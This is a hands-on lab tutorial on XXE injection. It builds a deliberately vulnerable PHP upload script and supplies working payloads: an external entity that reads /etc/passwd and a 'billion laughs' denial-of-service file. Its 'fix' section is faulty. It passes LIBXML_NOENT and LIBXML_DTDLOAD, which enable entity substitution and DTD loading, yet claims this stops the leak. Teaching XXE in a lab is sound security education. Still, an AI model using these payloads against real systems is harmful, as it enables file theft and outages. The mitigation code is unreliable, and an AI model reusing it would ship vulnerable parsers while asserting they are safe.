Objective
Learn how to exploit XML External Entity (XXE) vulnerabilities to read sensitive server files or cause denial-of-service (DoS) attacks, and understand how to prevent such vulnerabilities using secure XML parsing practices.
Scenario
You are testing a file upload feature of a web application that processes XML data. Due to misconfigured XML parsing, the application is vulnerable to XXE Injection, allowing attackers to access sensitive server files or perform DoS attacks. Your goal is to exploit this vulnerability and learn how to secure XML parsing.
Lab Setup
Prerequisites:
- Basic knowledge of XML and PHP.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
PHP Script for XML Processing
Create a file upload.php:
<?php
if (isset($_POST['submit'])) {
$xml = $_FILES['xmlFile']['tmp_name'];
$content = file_get_contents($xml);
$doc = new DOMDocument();
$doc->loadXML($content);
$items = $doc->getElementsByTagName('item');
foreach ($items as $item) {
echo "<p>" . $item->nodeValue . "</p>";
}
}
?>
<form method="POST" enctype="multipart/form-data">
Upload XML File: <input type="file" name="xmlFile" required>
<button type="submit" name="submit">Upload</button>
</form>Running the Application
- Start the Apache server.
- Place
upload.phpin the web server’s root directory (htdocsfor XAMPP). - Open
http://localhost/upload.phpin your browser.
Exploitation Steps
Step 1: Crafting the Malicious XML Payload
Create a file payload.xml:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
<item>&xxe;</item>
</data>Upload payload.xml through the file upload form.
Expected Result:
- The content of the
/etc/passwdfile is displayed, confirming the vulnerability.
Step 2: Denial-of-Service Attack
Create a file billion_laughs.xml:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<data>
<item>&lol2;</item>
</data>Upload billion_laughs.xml to trigger resource exhaustion.
Expected Result:
- The server slows down or crashes due to exponential entity expansion.
Solution and Prevention
Problem Analysis
- The XML parser processes external entities, allowing file reads and DoS attacks.
Fixing the Vulnerability
Disable External Entity Loading
Modify upload.php to disable entity loading:
<?php
if (isset($_POST['submit'])) {
$xml = $_FILES['xmlFile']['tmp_name'];
$content = file_get_contents($xml);
$doc = new DOMDocument();
libxml_disable_entity_loader(true);
$doc->loadXML($content, LIBXML_NOENT | LIBXML_DTDLOAD);
$items = $doc->getElementsByTagName('item');
foreach ($items as $item) {
echo "<p>" . htmlspecialchars($item->nodeValue) . "</p>";
}
}
?>Use Secure XML Parsers
Switch to secure libraries like SimpleXML with entity loading disabled:
$xml = simplexml_load_file($_FILES['xmlFile']['tmp_name'], "SimpleXMLElement", LIBXML_NOENT | LIBXML_DTDLOAD);Validate and Sanitize Input
Use schema validation to ensure only valid XML is processed.
Limit File Uploads
Restrict file size and type to prevent malicious uploads.
Testing After Fix
- Re-upload the malicious
payload.xml. - Expected Result:
- The external entity is not processed, and the file content is not leaked.
Conclusion
In this lab, you exploited an XML External Entity (XXE) vulnerability to read server files and cause a denial-of-service attack. You also learned how to prevent such attacks by disabling external entity processing, using secure XML parsers, and implementing strict input validation.
0 Comments